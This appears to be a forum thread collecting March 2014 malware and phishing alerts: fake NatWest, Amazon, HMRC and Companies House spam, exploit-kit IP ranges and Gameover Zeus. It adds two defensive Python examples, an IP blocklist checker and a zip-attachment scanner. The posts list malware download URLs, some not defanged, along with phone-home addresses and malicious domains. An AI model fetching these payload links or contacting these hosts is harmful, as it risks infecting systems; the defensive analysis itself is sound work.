* https://www.virustotal.com/en-gb/ip-...0/information/
** http://www.dynamoo.com/files/64.120.242.160-27.csv
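The dynamoo posts above accumulate a dozen narrow r5x.org / Penziatki sub-allocations, the 64.120.242.160/27 range, and the coarse "accept the collateral damage" /16s. Hand-checking an address against that many CIDRs is error-prone, so here is an added example, not code from dynamoo.com: a stdlib-only Python helper that compiles the ranges quoted on this page into three tiers (the tiering is my own choice), reports which tier an address falls in, and renders the narrow tiers as collapsed iptables DROP rules so adjacent /30s become one rule. The test addresses in the usage note are either taken from the page (64.120.242.178 from the 13 March injection post lands inside 64.120.242.160/27) or constructed.

```python
"""Check addresses against the CIDR blocklists recommended on this page and render firewall rules.

Added example, not code from dynamoo.com. The CIDRs are the ones quoted above;
the three-tier split and the sample addresses are my own.
"""
import ipaddress
from typing import Dict, Iterable, List

# Narrow ranges identified as r5x.org / Penziatki sub-allocations (quoted in the posts above).
PENZIATKI_RANGES = [
    "198.27.114.16/30", "198.27.114.64/27", "198.50.186.232/30", "198.50.186.236/30",
    "198.50.186.252/30", "198.50.231.204/30", "198.50.140.64/27", "192.95.6.196/30",
    "198.50.212.116/30", "198.50.131.220/30", "192.95.40.240/30", "192.95.51.164/30",
]
# Non-OVH exploit-kit hosting called out above.
OTHER_EK_RANGES = ["64.120.242.160/27"]
# Coarse ranges the author suggests only for security-sensitive environments.
AGGRESSIVE_RANGES = ["198.27.0.0/16", "198.50.0.0/16", "198.95.0.0/16"]

BLOCKLISTS = {
    "penziatki": PENZIATKI_RANGES,
    "other_ek": OTHER_EK_RANGES,
    "aggressive": AGGRESSIVE_RANGES,
}


def compile_blocklists(lists: Dict[str, List[str]] = BLOCKLISTS):
    """Parse every CIDR once; strict=True rejects a typo such as a /30 with host bits set."""
    return {name: [ipaddress.ip_network(cidr, strict=True) for cidr in cidrs]
            for name, cidrs in lists.items()}


def lookup(ip: str, compiled) -> Dict[str, List[str]]:
    """Return {tier: [matching CIDRs]} for an address. An empty dict means no tier matched."""
    addr = ipaddress.ip_address(ip)
    hits = {}
    for name, nets in compiled.items():
        matched = [str(n) for n in nets if addr in n]
        if matched:
            hits[name] = matched
    return hits


def iptables_rules(compiled, tiers: Iterable[str] = ("penziatki", "other_ek"),
                   chain: str = "OUTPUT") -> List[str]:
    """Render DROP rules for the chosen tiers, merging adjacent ranges first so
    198.50.186.232/30 and 198.50.186.236/30 become a single 198.50.186.232/29 rule."""
    nets = [n for name in tiers for n in compiled[name]]
    return [f"iptables -A {chain} -d {n} -j DROP"
            for n in ipaddress.collapse_addresses(nets)]


if __name__ == "__main__":
    compiled = compile_blocklists()
    # 64.120.242.178 is the injection-attack IP from the 13 March post; the others are constructed.
    for ip in ("64.120.242.178", "198.50.186.234", "198.50.1.1", "8.8.8.8"):
        print(ip, lookup(ip, compiled) or "clean")
    print("\n".join(iptables_rules(compiled)))
```

Keep the "aggressive" tier out of the rendered rules unless you have decided to accept the collateral damage the author warns about; `lookup` still reports it so an analyst can see that an address sits inside the wider OVH Canada block even when no narrow range matches.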
___
Fake NatWest SPAM ...
- http://blog.dynamoo.com/2014/03/natw...ed-secure.html
19 Mar 2014 - "This -fake- NatWest spam has a malicious attachment:
Date: Wed, 19 Mar 2014 15:14:02 +0100 [10:14:02 EDT]
From: NatWest [secure.message@ natwest .co .uk]
Subject: You have received a secure message
You have received a secure message
Read your secure message by opening the attachment, SecureMessage.zip. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk at 0131 556 4226.
First time users - will need to register after opening the attachment...
Attached to the message is an archive file SecureMessage.zip which in turn contains a malicious executable SecureMessage.scr which has a VirusTotal detection rate of 8/51*. Automated analysis tools... show attempted downloads from the following domains, both hosted on servers that appear to be completely compromised and should be blocked.
199.193.115.111 (NOC4Hosts, US) ...
184.107.149.74 (iWeb, Canada) ...
50.116.4.71 (Linode, US) ...
Recommended blocklist:
199.193.115.111
184.107.149.74
50.116.4.71 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/fil...is/1395245960/
Screenshot: https://gs1.wac.edgecastcdn.net/8019...ol61r6pupn.png
___
Steer Clear of the Latest Twitter Spamrun
- http://blog.malwarebytes.org/social-...itter-spamrun/
Mar 19, 2014 - "Watch out for messages on your Twitter feed like the ones below, because they’ll try their best to give your account a bad hair day:
> http://cdn.blog.malwarebytes.org/wp-...twitphish1.jpg
Some of the (many) messages read as follows, and all are designed to entice the recipient into clicking:
lmao I had a eerie feeling this was yours
haha this post by you is so funny
haha this was made by you?
Im laughing so much right now at this
haha this update by you is odd
lol I had a eerie feeling this was you
lolz this post by you is nuts
lol this was posted by you?
omfg this entry by you is crazy
lolz this tweet by you is so funny
LOL you got 2 see this, its epic
omfg this post by you is cool
lolz this post by you is hilarious... (more)
There are others, but those seem to be the main ones and everything else is typically a variation on the above themes. The links take end-users to a site informing them of the following:
“Your current session has ended
For security purposes you were forcibly signed out. For security purposes you need to verify your Twitter account, please login”
> http://cdn.blog.malwarebytes.org/wp-...3/twitpsh2.jpg
... change your password if you think you’ve already been affected by this one and clear up any rogue links lying around on your feed – your followers will thank you for it.
Christopher Boyd (Hat-tip to @Cliffsull *)"
* https://twitter.com/cliffsull
:mad::mad:
Something evil on 66.96.195.32/27, PHP bug ...
FYI...
Something evil on 66.96.195.32/27
- http://blog.dynamoo.com/2014/03/some...961953227.html
Mar 20, 2014 - "Another bad bunch of IPs hosted by Network Operations Center in Scranton following on from yesterday*, this time 66.96.195.32/27 which seems to be more of the same thing. The exploit kit in question is the Goon EK, as shown in this URLquery report**. It seems that it spreads by malicious SWF files being injected into legitimate websites (I think this one, for example [3]). The easiest thing to do would be to block traffic to 66.96.195.32/27, but I can see... malicious websites active in that range (all on 66.96.195.49 [4])..."
* http://blog.dynamoo.com/2014/03/some...024216027.html
** http://urlquery.net/report.php?id=1395311494976
3] http://urlquery.net/report.php?id=1395322515680
4] https://www.virustotal.com/en/ip-add...9/information/
___
PHP bug allowing site hijacking still menaces Internet 22 months on
- http://arstechnica.com/security/2014...-22-months-on/
Mar 19 2014 - "A vulnerability that allows attackers to take control of websites running older versions of the PHP scripting language continues to threaten the Internet almost two years after security researchers first warned that attackers could use it to remotely execute malicious code on vulnerable servers. As Ars reported 22 months ago, the code-execution exploits worked against PHP sites only when they ran in common gateway interface mode, a condition that applied by default to those running the Apache Web server. According to a blog post published Tuesday*, CVE-2012-1823**, as the vulnerability is formally indexed, remains under attack today by automated scripts that scour the Internet in search of sites that are susceptible to the attack. The sighting of in-the-wild exploits even after the availability of security patches underscores the reluctance of many sites to upgrade... PHP versions prior to 5.3.12 and 5.4.2 are vulnerable. The Imperva blog post* said that an estimated 16 percent of public websites are running a vulnerable version. People running susceptible versions should upgrade right away. Readers who visit vulnerable sites should notify the operators of the risk their site poses..."
* http://blog.imperva.com/2014/03/thre...r-command.html
Mar 18, 2014
** https://web.nvd.nist.gov/view/vuln/d...=CVE-2012-1823 - 7.5 (HIGH)
Last revised: 07/20/2013
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/cent...utbreak.x?i=77
Fake Product Shipping Documents Email Messages - 2014 Mar 20
Fake Financial Documents Email Messages - 2014 Mar 20
Email Messages with Malicious Attachments - 2014 Mar 20
Fake Tax Return Notification Email Messages - 2014 Mar 20
Email Messages with Malicious Attachments - 2014 Mar 20
Fake Document Processing Request Email Messages - 2014 Mar 20
Fake Fax Message Delivery Email Messages - 2014 Mar 20
Fake Product Order Quotation Email Messages - 2014 Mar 20
Fake Tax Document Email Messages - 2014 Mar 20
Fake Payroll Information Notification Email Messages - 2014 Mar 20
Fake Incoming Money Transfer Notification Email Messages - 2014 Mar 20
Fake Bank Payment Transfer Notification Email Messages - 2014 Mar 20
Fake Lawsuit Details Attachment Email Messages - 2014 Mar 20
Fake Account Payment Information Email Messages - 2014 Mar 20
Fake Product Order Notification Email Messages - 2014 Mar 20
Fake Failed Delivery Notification Email Messages - 2014 Mar 20
Fake Bank Transaction Notification Email Messages - 2014 Mar 19
(More detail and links at the cisco URL above.)
:mad: :sad:
Fake Amazon, Companies House SPAM, Something evil on 50.116.4.71 ...
FYI...
Fake Amazon .co .uk SPAM, Something evil on 50.116.4.71
- http://blog.dynamoo.com/2014/03/amaz...g-evil-on.html
21 Mar 2014 - "This -fake- Amazon .co .uk spam comes with a malicious attachment:
Date: Fri, 21 Mar 2014 13:40:05 +0530 [04:10:05 EDT]
From: "AMAZON .CO .UK" [SALES@ AMAZON .CO .UK]
Cc: ; Fri, 21 Mar 2014 13:40:05 +0530
Subject: Your Amazon.co.uk order ID841-6379889-7781077
Hello, Thanks for your order. We’ll let you know once your item(s) have dispatched. You can check the status of your order or make changes to it by visiting Your Orders on Amazon.co.uk.
Order Details
Order #799-5059801-3688207 Placed on March 21, 2014 Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon. Amazon .co .uk...
There is an attachment Order details 21.04.2014 Amazon 19-1101.zip which contains a quite large 596Kb malicious executable Order details 21.04.2014 Amazon 19-1101.exe which only has a VirusTotal detection rate of 2/51*. The Malwr analysis** is the most comprehensive, and shows that it attempts to phone home... Out of these, aulbbiwslxpvvphxnjij .biz seems to be active on 50.116.4.71 (Linode, US). Combining the "phone home" domains with the other malicious domains hosted on that IP gives the following recommended blocklist:
50.116.4.71
afaxdlrnjdevgddqrcvkdmvemwo .org ..."
(Long list at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/fil...is/1395393900/
** https://malwr.com/analysis/MWI1MGFlY...MzMmViZTk4ZjI/
- https://www.virustotal.com/en/ip-add...1/information/
___
Fake Companies House SPAM and 50.116.4.71 (again)
- http://blog.dynamoo.com/2014/03/comp...471-again.html
21 Mar 2014 - "This -fake- Companies House spam comes with a malicious attachment:
Date: Fri, 21 Mar 2014 11:05:35 +0100 [06:05:35 EDT]
From: Companies House [WebFiling@ companieshouse .gov .uk]
Subject: Incident 8435407 - Companies House
The submission number is: 8435407
For more details please check attached file.
Please quote this number in any communications with Companies House.
All Web Filed documents are available to view / download for 10 days after their
original submission. However it is not possible to view copies of accounts that
were downloaded as templates.
Companies House Executive Agency may use information it holds to prevent
and detect fraud. We may also share such information, for the same purpose,
with other Organizations that handle public funds.
If you have any queries please contact the Companies House Contact Centre
on +44 (0)303 1234 500 or email enquiries@companies-house .gov .uK
Note: This email was sent from a notification-only email address which cannot
accept incoming email. Please do not reply directly to this message...
Attached is an archive file CH_Case_8435407.zip which in turn contains the malicious executable CH_Case_21032014.scr which has a VirusTotal detection rate of 3/49*. The Malwr analysis -again- shows an attempted connection to a Linode IP at 50.116.4.71 using the domain aulbbiwslxpvvphxnjij .biz. The malware also downloads a config file from a hacked WordPress installation at [donotclick]premiercrufinewine .co .uk/wp-content/uploads/2014/03/2103UKp.qta plus a number of other domains that are not resolving (listed below). I would recommend... the following blocklist in combination with this one.
50.116.4.71
aulbbiwslxpvvphxnjij.biz ..."
(Long list at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/fil...is/1395396703/
___
Fake Air Canada Ticket - malware
- http://www.threattracksecurity.com/i...icket-malware/
Mar 20, 2014 - "... The email (pictured below) was directed to an employee inbox purporting to be from Air Canada and directing the recipient to download and print their ticket. (Note: Air Canada was not hacked, nor were they part of this malware. The malicious URL distributing a previously unidentified malware is simply being masked to look like it’s coming from Air Canada.)
> http://www.threattracksecurity.com/i...ious-Email.png
The link hxxps ://www.aircanada .com/travelInformation/viewOrderInfo.do?action=download&fid=QB820910108CA pointed to another address, hxxp ://alienstub.com/pdf_ticket_820910108.zip, which hosts the malware, a zipped malicious file. Once the zip file is decompressed, the user will see a file called pdf_ticket_820910108.pif. Analysis by ThreatSecure quickly revealed the sample as an exploit categorized with a high severity (see in-product analysis screen below), exhibiting malicious behavior like disabling the Windows firewall, changing proxy settings in Internet Explorer, opening the command prompt, creating executable files and connecting to Windows Remote Access Connection Manager.
> http://www.threattracksecurity.com/i...f-analsysi.jpg
... At the time of posting this blog, 16/51* antivirus vendors on VirusTotal detect this file as being malicious. The domain hxxp ://alienstub .com appears to be registered in China...
* https://www.virustotal.com/en/file/d...7622/analysis/
alienstub .com
108.162.198.134 - https://www.virustotal.com/en-gb/ip-...4/information/
108.162.199.134 - https://www.virustotal.com/en-gb/ip-...4/information/
:fear: :mad:
Malware sites to block 23/3/14 (P2P/Gameover Zeus)
FYI...
Malware sites to block 23/3/14 (P2P/Gameover Zeus)
- http://blog.dynamoo.com/2014/03/malw...ock-23314.html
23 Mar 2014 - "These domains and IPs are associated with the Peer-to-peer / Gameover variant of Zeus as described in this blog post at MalwareMustDie*. I recommend that you -block- the -IPs- and/or domains listed as they are all malicious:
50.116.4.71 (Linode, US) ...
178.79.178.243 (Linode, UK)
212.71.235.232 (Linode, UK)
23.239.140.156 (Root Level Technology, US)
50.116.4.71 ...
178.79.178.243 ...
212.71.235.232 ...
23.239.140.156 ..."
(More - long list of domains listed at the dynamoo URL above.)
* http://blog.malwaremustdie.org/2014/...er-crooks.html
:mad::mad: :fear:
Fake Flash update hosted on OneDrive, HMRC SPAM
FYI...
Fake Flash update hosted on OneDrive
- http://blog.dynamoo.com/2014/03/js-i...sh-update.html
25 Mar 2014 - "This kind of attack is nothing new, but there has been a sharp uptick recently in injection attacks that alter .js files on vulnerable systems. The payload is a -fake- Flash update with a surprisingly low detection rate, hosted on Microsoft OneDrive. The first step in the attack is through a vulnerable site such as this one [urlquery*]. In turn, the infected .js file leads to [donotclick]alientechdesigns .com/NLBFH8ZG.php?id=88473423 which in turn leads to a fake Flash popup hosted at [donotclick]alientechdesigns .com/NLBFH8ZG.php?html=27 which you can see an approximation of here [urlquery**].
> https://lh3.ggpht.com/-sLx4s_0GoKQ/U...fake-flash.jpg
The link in the popup goes to a download location at [donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21111 which downloads a file flashplayerinstaller.exe. flashplayerinstaller.exe is the first stage in the infection; it has a VirusTotal detection rate of just 3/51***. The Malwr report shows that this then downloads two additional components, from:
[donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21112
[donotclick]onedrive.live .com/download.aspx?cid=20e850f993bd56fd&resid=20E850F993BD56FD%21108
The first one of these is called flashplayer2.exe which has a VirusTotal detection rate of 4/51 [5]. Malwr, Anubis and Comodo CAMAS show some working of this malware. The second file is called update2.exe with a VirusTotal detection rate of 5/49****. This seems somewhat resistant to automated analysis tools... This sort of attack is hard to block from a network point of view as it leverages legitimate sites. Perhaps the best way to protect yourself is a bit of user education about where it is appropriate to download updates from."
* http://urlquery.net/report.php?id=1395739538065
** http://urlquery.net/report.php?id=1395739786885
*** https://www.virustotal.com/en-gb/fil...is/1395739964/
**** https://www.virustotal.com/en-gb/fil...is/1395742041/
5] https://www.virustotal.com/en/file/9...is/1395740434/
___
Fake HMRC SPAM
- http://blog.dynamoo.com/2014/03/you-...ages-from.html
25 Mar 2014 - "This fake HMRC spam comes with a malicious attachment:
Date: Tue, 25 Mar 2014 12:59:28 +0100 [07:59:28 EDT]
From: "noreply@hmrc .gov .uk" [noreply@hmrc .gov .uk]
Subject: You have received new messages from HMRC
Please be advised that one or more Tax Notices (P6, P6B) have been issued.
For the latest information on your Tax Notices (P6, P6B) please open attached report.
Please do not reply to this e-mail.
1.This e-mail and any files or documents transmitted with it are confidential and
intended solely for the use of the intended recipient. Unauthorised use, disclosure or
copying is strictly prohibited and may be unlawful. If you have received this e-mail in
error, please notify the sender at the above address and then delete the e-mail from your
system. 2. If you suspect that this e-mail may have been intercepted or amended, please
notify the sender. 3. Any opinions expressed in this e-mail are those of the individual
sender and not necessarily those of QualitySolicitors Punch Robson. 4. Please note that
this e-mail and any attachments have been created in the knowledge that internet e-mail
is not a 100% secure communications medium. It is your responsibility to ensure that they
are actually virus free. No responsibility is accepted by QualitySolicitors Punch Robson
for any loss or damage arising from the receipt of this e-mail or its contents.
QualitySolicitors Punch Robson: Main office 35 Albert Road Middlesbrough TS1 1NU
Telephone 01642 230700. Offices also at 34 Myton Road, Ingleby Barwick, Stockton On Tees,
TS17 0WG Telephone 01642 754050 and Unit E, Parkway Centre, Coulby Newham, Middlesbrough
TS8 0TJ Telephone 01642 233980 VAT no. 499 1588 77. Authorised and regulated by the
Solicitors Regulation Authority (57864). A full list of Partners names is available from
any of our offices....
The attachment is called HMRC_TAX_Notice_rep.zip which in turn contains a malicious executable HMRC_TAX_Notice_rep.scr which has a VirusTotal detection rate of 5/51*. According to the Malwr report, the malware makes a download from the following locations hosted on 67.205.16.21 (New Dream Network, US):
[donotclick]sandsca .com.au/directions/2503UKp.tis
[donotclick]www.sandsca .com.au/directions/2503UKp.tis
Subsequent communications are made with aulbbiwslxpvvphxnjij .biz on the familiar looking Linode IP of 50.116.4.71, and also qkdapcqinizsczxrwaelaimznfbqq .biz on another Linode IP of 178.79.178.243. An attempt is also made to connect to hzdmjjneyeuxkpzkrunrgyqgcukf .org which does not resolve...
Recommended blocklist:
50.116.4.71
178.79.178.243
sandsca .com
aulbbiwslxpvvphxnjij .biz
qkdapcqinizsczxrwaelaimznfbqq .biz
hzdmjjneyeuxkpzkrunrgyqgcukf .org "
* https://www.virustotal.com/en-gb/fil...is/1395750216/
- https://www.virustotal.com/en/ip-add...1/information/
- https://www.virustotal.com/en/ip-add...1/information/
- https://www.virustotal.com/en/ip-add...3/information/
___
Google Drive Email - Phish ...
- http://www.hoax-slayer.com/google-dr...ing-scam.shtml
Mar 25, 2014 - "... email requests recipients to click a link to view a document that the sender uploaded using Google Cloud Drive. There is no document to be viewed, urgent or otherwise. The email is a -phishing- scam designed to trick recipients into giving their email login details to Internet criminals... Example:
Hello,
Kindly click the link to view the document I uploaded for you using Google
cloud drive.
[Link removed]
Just Sign in with your email to view the document, it is very important.
Thank you,
Rev. Dr. Karen [Surname Removed]
Serving Humanity Spiritually
[Phone number removed]
Good works are links that form a chain of love.
Mother Teresa
Screenshot of phishing website:
> http://www.hoax-slayer.com/images/go...ing-scam-1.jpg
... Users who fall for the ruse and click the link as instructed will be taken to a -bogus- website that includes the Google Drive logo along with a login screen that asks for both their email address and email password. If users submit their email credentials as requested and click the 'View document' button, they will be redirected to Google's Gmail home page... however, their email address and password will be sent to online criminals. The criminals can use the stolen details to hijack webmail accounts belonging to victims. Hijacked accounts can be used to perpetrate more scam and spam campaigns, all in the names of the victims. If victims submitted details for a Gmail account, the scammers may be able to use the same login information to access other Google services as well as email..."
___
Gameover ZeuS now targets users of employment websites
- http://net-security.org/malware_news.php?id=2745
Mar 25, 2014 - "Some newer variants of the Gameover Zeus Trojan, which is exceptionally good at using complex web injections to perform Man-in-the-Browser (MITB) attacks and gain additional information about the victims to be used for bypassing multi-factor authentication mechanisms and effecting social engineering attacks, have been spotted targeting users of popular employment websites. They initially focused on CareerBuilder.com (largest employment website in the US), but now also on Monster.com (one of the largest in the world). The -fake- login page victims are served with looks virtually identical to the legitimate one, but the next one is a web form injected by the malware:
> http://www.net-security.org/images/a...r-25032014.jpg
There are 18 different questions to choose from, and they range from the name of the city where your sibling lives/you got your first job/you met your spouse, to the name of your school(s)/friend/work supervisor and significant dates and numbers in your life..."
- http://www.f-secure.com/weblog/archives/00002687.html
March 25, 2014
___
Deceptive ads expose users to the Adware.Linkular/Win32.SpeedUpMyPC.A PUAs
- http://www.webroot.com/blog/2014/03/...-applications/
Mar 25, 2014 - "Rogue vendors of Potentially Unwanted Applications (PUAs) continue tricking tens of thousands of gullible users into installing deceptive and privacy violating applications. Largely relying on ‘visual social engineering’ tactics and basic branding concepts, the majority of campaigns convincingly present users with legitimately looking ToS (Terms of Service)/EULA (End User License Agreements) which socially engineered users accept, thereby assuming the responsibility for the potential privacy-violating activities taking place on their host. We’ve recently spotted yet another PUA campaign, relying on deceptive “Download Now” types of ads, enticing users into downloading the bogus GetMyFiles (Adware.Linkular) application, as well as the rogue SpeedUpMyPC (Win32.SpeedUpMyPC.A) PUA...
Sample screenshot of Adware.Linkular download page:
> https://www.webroot.com/blog/wp-cont...pplication.png
Sample screenshot of Win32.SpeedUpMyPC.A download page:
> https://www.webroot.com/blog/wp-cont...ication_01.png
Domain name reconnaissance:
getmyfilesnow .info – 54.208.165.36
getmyfilesnow .com – 174.142.147.2
coollinks .us – 174.142.147.5
linkular .com – 208.109.216.125
Detection rate for the PUA: MD5: 0d60941d1ec284cab2e861e05df89511 * ...
Known to have responded to 54.208.165.36 ...
Once executed, the sample phones back to:
hxxp // 107.23.152.80 /api/software/?s=887&os=win32&output=1&v=2.2.2&l=1033&np=0&osv=5.1&b=ie&bv=8.0.6001.18702&c=12&cv=2.2.2.1768
Sample detection rate for the Win32.SpeedUpMyPC.A PUA:
MD5: 0a8ecb11e39db5647dcad9f0cc938c99 ** ... "
* https://www.virustotal.com/en/file/2...is/1395713453/
** https://www.virustotal.com/en/file/e...is/1395717259/
:mad::mad: :fear:
Something evil on 173.212.223.249, Fake PDF malware...
FYI...
Something evil on 173.212.223.249
- http://blog.dynamoo.com/2014/03/some...212223249.html
26 Mar 2014 - "There's some sort of evil at work here, but I can't quite replicate it.. however I would recommend that you put a block in for 173.212.223.249 (Network Operations Center, US). The infection chain I have spotted here starts with a typical compromised website, in this case:
[donotclick]onerecipedaily .com/prawn-patia-from-anjum-anands-i-love-curry/
A quick look at the URLquery report* shows a general alert, but no smoking gun.. The incident logs come up with a generic detection... The following malicious subdomains are also active on 173.212.223.249:
bkbr.beuqnyrtz .com
syb.beuqnyrtz .com
sxxmxv.beuqnyrtz .info
The simplest thing to do to protect yourself against this particular threat is to use the following blocklist:
173.212.223.249
beuqnyrtz .com
beuqnyrtz .info "
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1395844844686
- https://www.virustotal.com/en/ip-add...9/information/
- https://www.virustotal.com/en/ip-add...1/information/
___
Info from SantanderBillpayment. co .uk - fake PDF malware
- http://myonlinesecurity.co.uk/info-s...e-pdf-malware/
26 Mar 2014 - "Info from SantanderBillpayment.co.uk pretending to come from Santanderbillpayment-noreply@SantanderBillPayment .co .uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. Almost all of these have a password stealing component, with the aim of stealing your email or FTP (web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details. Analysis of this one is showing it likely to be a Gameover Zeus/Zbot variant. This is “new” — it’s going after a similar URL as the Pony samples we have been seeing in the last few weeks, but completely different binary. This has VM detection and if it detects that, it runs routines to choke memory and the CPU. On real hardware, it tries this URL (http :// 62.76.45.233 /2p/1.exe) given recent patterns, this is likely to be a Gameover production...
Thank you for using BillPay. Please keep this email for your records.
The following transaction was received on 18 March 2014 at 20:03:41.
Payment type: VAT
Customer reference no: 9789049470611
Card type: Visa Debit
Amount: 483.93 GBP
Your transaction reference number for this payment is IR19758383.
Please quote this reference number in any future communication regarding this payment.
Full information in attachment.
Yours sincerely,
Banking Operations
This message is intended for the named person above and may be confidential, privileged or otherwise protected from disclosure...
26 March 2014 : VAT_F37D8FE5F9.zip (72kb) : Extracts to ATT00347_761105586544.pdf.exe
Current Virus total detections: 7/51* MALWR Auto Analysis** ...
... another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c...d4a2/analysis/
** https://malwr.com/analysis/NTQyOGVhN...RlMDZmMjVhMDk/
- https://www.virustotal.com/en/ip-add...3/information/
:mad::fear::sad:
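Added example (not from any of the quoted blogs or the forum poster): a small mail-gateway style check for the attachment pattern that recurs through the NatWest, Amazon, Companies House, HMRC and Santander posts above, a .zip wrapping a .scr/.exe/.pif payload, sometimes behind a decoy double extension such as ATT00347_761105586544.pdf.exe. The archives and their contents are constructed stand-ins; the extension lists are assumptions chosen for the demo.

```python
"""
Added example: flag .zip attachments that carry a disguised Windows executable.
Checks both the member's name (executable extension, decoy double extension)
and its content (a PE file starts with the 'MZ' DOS header regardless of name).
All samples below are constructed for the demo and contain no real malware.
"""
import io
import zipfile

# Assumed lists for the demo: extensions Windows executes on double-click,
# and "document" extensions used as decoys in front of a real executable one.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".txt", ".jpg"}


def classify_member(name: str, head: bytes) -> list[str]:
    """Return the reasons an archive member looks like a disguised executable."""
    reasons = []
    base = name.lower().rsplit("/", 1)[-1]      # strip any folder path inside the zip
    parts = base.split(".")
    if len(parts) >= 2:
        ext = "." + parts[-1]
        if ext in EXECUTABLE_EXTS:
            reasons.append(f"executable extension {ext}")
            # e.g. ATT00347_761105586544.pdf.exe: the .pdf is only a decoy
            if len(parts) >= 3 and "." + parts[-2] in DECOY_EXTS:
                reasons.append(f"decoy double extension .{parts[-2]}{ext}")
    # Content check: a PE binary begins with 'MZ' whatever it is called
    if head[:2] == b"MZ":
        reasons.append("PE (MZ) header")
    return reasons


def scan_zip_attachment(data: bytes) -> dict[str, list[str]]:
    """Map each suspicious member name in the archive to its flag reasons."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)           # only the first two bytes are needed
            reasons = classify_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_zip(members: dict[str, bytes]) -> bytes:
    """Construct an in-memory .zip archive for the demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples modelled on the filenames quoted in the posts above.
FAKE_PE = b"MZ" + b"\x00" * 62             # DOS header stub, not a real program
SAMPLES = {
    "SecureMessage.zip": build_zip({"SecureMessage.scr": FAKE_PE}),
    "VAT_F37D8FE5F9.zip": build_zip({"ATT00347_761105586544.pdf.exe": FAKE_PE}),
    "renamed.zip": build_zip({"invoice.pdf": FAKE_PE}),   # PE content under a document name
    "clean.zip": build_zip({"report.pdf": b"%PDF-1.4 constructed"}),
}


def scan_all(samples=SAMPLES) -> dict[str, dict[str, list[str]]]:
    """Scan every sample attachment; an empty dict means nothing was flagged."""
    return {att: scan_zip_attachment(blob) for att, blob in samples.items()}


if __name__ == "__main__":
    for attachment, findings in scan_all().items():
        print(f"{attachment}: {'BLOCK' if findings else 'ok'} {findings}")
```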